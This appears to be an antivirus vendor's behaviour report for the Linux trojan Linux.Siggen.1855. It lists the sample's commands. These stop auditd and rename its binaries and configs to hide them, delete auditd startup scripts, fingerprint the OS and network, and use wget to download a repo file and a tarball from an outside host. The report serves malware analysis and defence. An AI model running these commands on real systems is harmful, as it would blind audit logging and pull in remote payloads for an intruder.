Linux.Siggen.1855
Added to the Dr.Web virus database:
2019-06-21
Description added:
2019-06-21
Technical Information
Malicious functions:
Performs process tracing:
<SAMPLE>
<SAMPLE_FULL_PATH>
Manages services:
/sbin/service auditd stop
/sbin/service wsosstatd stop
Launches processes:
/bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
<SAMPLE_FULL_PATH>
/bin/bash <SAMPLE_FULL_PATH> -c
cat /etc/issue
head -n 1
grep -iE Red.*release 4|CentOS.*4\.
grep -iE Red.*release 4|CentOS.*4\. /etc/redhat-release
grep -iE Red.*release 5|CentOS.*5\.
grep -iE Red.*release 5|CentOS.*5\. /etc/redhat-release
grep -iE Red.*release 6|CentOS.*6\.
grep -iE Red.*release 6|CentOS.*6\. /etc/redhat-release
/sbin/ifconfig -a
grep inet
grep -v 127.0.0.1
grep -v inet6
grep -v ^169.254
tr -d addr:
wc -l
sed s/\([0-9]\+\.[0-9]\+\.[0-9]\+\)\.[0-9]\+/\1/g
awk {print $2}
sleep 5
wget -e -http-proxy= -t 2 -T 50 http://wsautoinstall1.lxdns.com/ws.repo -O /etc/yum.repos.d/ws.repo
grep already
mkdir -p /var/lib/local/etc/WsCdnOsStatLog/LogSummary/wsosstad/.wsosstat/
mv /etc/audisp/audispd.conf /etc/audisp/wsosstatdispd.conf
mv /etc/audit/audit.rules /etc/audit/wsosstat.acl
mv /etc/audit/auditd.conf /etc/audit/wsosstatd.conf
mv /etc/rc.d/init.d/auditd /etc/rc.d/init.d/wsosstatd
mv /etc/sysconfig/auditd /etc/sysconfig/wsosstatd
mv /etc/audisp /etc/wsosstatdisp
mv /etc/audit /etc/wsosstat
mv /sbin/audispd /sbin/wsosstatdispd
mv /sbin/auditctl /sbin/wsosstatctl
mv /sbin/auditd /sbin/wsosstatd
mv /sbin/aureport /sbin/wsosstatreport
mv /sbin/ausearch /sbin/wsosstatsearch
mv /sbin/autrace /sbin/wsosstattrace
mv /usr/bin/aulastlog /usr/bin/wsosstatlastlog
mv /usr/bin/ausyscall /usr/bin/wsosstatsyscall
/sbin/chkconfig --add wsosstatd
xargs -i rm -rf {}
find /etc/rc.d -name *auditd*
wget -e -http-proxy= -t 2 -T 50 http://wsautoinstall1.lxdns.com/tools/wsosstat.tar.gz -O /tmp/wsosstat.tar.gz
Kills the following processes:
<SAMPLE>
<SAMPLE_FULL_PATH>
Performs operations with the file system:
Creates folders:
/var/lib/local
/var/lib/local/etc
/var/lib/local/etc/WsCdnOsStatLog
/var/lib/local/etc/WsCdnOsStatLog/LogSummary
/var/lib/local/etc/WsCdnOsStatLog/LogSummary/wsosstad
/var/lib/local/etc/WsCdnOsStatLog/LogSummary/wsosstad/.wsosstat
Creates or modifies files:
/etc/yum.repos.d/ws.repo
/tmp/wsosstat.tar.gz
Network activity:
Establishes connection:
HTTP GET requests:
ws###########1.lxdns.com/tools/wsosstat.tar.gz
DNS ASK:
Other:
Collects OS information
Collects RAM information